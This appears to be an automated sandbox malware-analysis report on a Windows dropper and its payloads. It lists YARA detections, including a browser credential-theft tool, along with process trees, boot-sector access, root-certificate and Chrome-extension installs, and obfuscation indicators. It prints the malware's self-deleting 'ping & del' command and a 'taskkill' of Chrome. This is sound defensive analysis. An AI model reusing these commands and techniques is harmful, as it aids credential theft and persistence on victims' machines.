Source: 4.2.aliens.exe.10000000.6.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.4750000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.46e0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.46c0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.10000000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.4750000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.10000000.11.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.5320000.10.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 21.2.1E1C360C582DF797.exe.4e60000.9.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 25.2.1E1C360C582DF797.exe.5230000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winEXE@31/50@223/4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01216E5E GetLastError,FormatMessageW, 1_2_01216E5E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E621870 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 0_2_6E621870
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6286A0 LoadResource,LockResource,SizeofResource, 0_2_6E6286A0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe File created: C:\Program Files (x86)\71eza90awf48 Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5364:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\Users\user\AppData\Local\Temp\nsqEF28.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Command line argument: sfxname 1_2_0122D42A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Command line argument: sfxstime 1_2_0122D42A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Command line argument: STARTDLG 1_2_0122D42A
Source: h1GodtbhC8.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1607186572092.exe System information queried: HandleInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: h1GodtbhC8.exe Virustotal: Detection: 46%
Source: h1GodtbhC8.exe Metadefender: Detection: 16%
Source: h1GodtbhC8.exe ReversingLabs: Detection: 64%
Source: 1E1C360C582DF797.exe String found in binary or memory: -StartTP
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File read: C:\Users\user\Desktop\h1GodtbhC8.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\h1GodtbhC8.exe 'C:\Users\user\Desktop\h1GodtbhC8.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Source: unknown Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Source: unknown Process created: C:\Users\user\AppData\Roaming\1607186572092.exe 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'
Source: unknown Process created: C:\Users\user\AppData\Roaming\1607186588295.exe 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe' Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3 Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3 Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: C:\Users\user\AppData\Roaming\1607186572092.exe 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: C:\Users\user\AppData\Roaming\1607186588295.exe 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Install
Source: Window Recorder Window detected: More than 3 window changes detected
Source: h1GodtbhC8.exe Static file information: File size 4671378 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to behavior
Source: h1GodtbhC8.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: setup.exe, 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1607186572092.exe, 0000001C.00000002.546755980.000000000040F000.00000002.00020000.sdmp, 1607186588295.exe, 0000001D.00000002.580846767.000000000040F000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibClr\obj\Release\SibClr.pdb source: h1GodtbhC8.exe, 00000000.00000003.367160882.0000000000745000.00000004.00000001.sdmp
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.826855048.00000000026F6000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb} source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr
Source: Binary string: C:\Users\Lenny\Documents\nsis-3.01-src\build\urelease\stub_zlib-x86-ansi\stub_zlib.pdb source: aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000024.00000002.639458414.0000000000BDC000.00000002.00020000.sdmp
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Unpacked PE file: 25.2.1E1C360C582DF797.exe.4750000.5.unpack
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xBD323864 [Sat Aug 2 06:04:20 2070 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
File is packed with WinRar
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe File created: C:\Program Files (x86)\71eza90awf48\__tmp_rar_sfx_access_check_5371765 Jump to behavior
PE file contains an invalid checksum
Source: 1E1C360C582DF797.exe.4.dr Static PE information: real checksum: 0xe6954 should be:
Source: h1GodtbhC8.exe Static PE information: real checksum: 0x0 should be: 0x47db98
Source: aliens.exe.1.dr Static PE information: real checksum: 0xe6954 should be:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E65F9A8 push ecx; ret 0_2_6E65F9BB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122E0E4 push eax; ret 1_2_0122E102
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122EBA6 push ecx; ret 1_2_0122EBB9
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10010579 push ecx; ret 4_2_1001058C
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026DF034 push E8026DF0h; iretd 21_2_026DF039
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E8680 push eax; ret 21_2_026E869E
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E78B0 push eax; ret 21_2_026E78C4
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E78B0 push eax; ret 21_2_026E78EC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E9FCF push ecx; ret 21_2_026E9FDF
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E88D9A push ecx; ret 21_2_04E88DAD
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E8EB91 push ecx; ret 21_2_04E8EBA4
Source: initial sample Static PE information: section name: .text entropy: 6.82101260035
Source: initial sample Static PE information: section name: .text entropy: 6.82101260035

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sector
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d 4_2_1001DA70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D7E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D370
Installs new ROOT certificates
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob Jump to behavior
Drops PE files
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe File created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe File created: C:\Program Files (x86)\71eza90awf48\aliens.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe File created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll Jump to dropped file
Installs a Chrome extension
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon48.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.html Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\background.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\book.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\jquery-1.8.3.min.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\manifest.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04FABE50 _memset,SHGetSpecialFolderPathA,_strcat_s,PathFileExistsA,_memset,GetPrivateProfileStringA,_strlen,_strlen,PathRemoveFileSpecA,_strcat_s,_strcat_s,PathFileExistsA,PathFindFileNameA, 21_2_04FABE50

Boot Survival:

barindex
Contains functionality to infect the boot sector
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d 4_2_1001DA70
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D7E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 4_2_1001D370

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\msiexec.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
